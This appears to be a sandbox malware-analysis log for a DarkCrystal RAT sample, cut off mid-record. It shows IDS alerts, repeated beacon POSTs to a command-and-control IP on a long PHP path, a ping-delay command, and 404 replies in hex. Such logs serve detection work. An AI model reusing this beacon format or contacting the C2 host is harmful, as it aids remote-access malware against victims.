Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49976 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49991 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49975 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49990 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49982 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49978 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49985 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49977 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49983 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49981 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49979 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49989 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49988 -> 38.180.228.120:80
Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49980 -> 38.180.228.120:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View | ASN Name: COGENT-174US COGENT-174US
Source: global traffic | HTTP traffic detected:
    POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 38.180.228.120
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 38.180.228.120
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Host: 38.180.228.120
    Content-Length: 344
    Expect: 100-continue
    Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 38.180.228.120Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 38.180.228.120Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:52:22 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 34 3a 32 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:20 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 
(Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:30 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 34 3a 34 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:41 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 
(Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 34 3a 35 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:50 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 
(Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:02 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:14 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:24 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:55:35 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 35 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 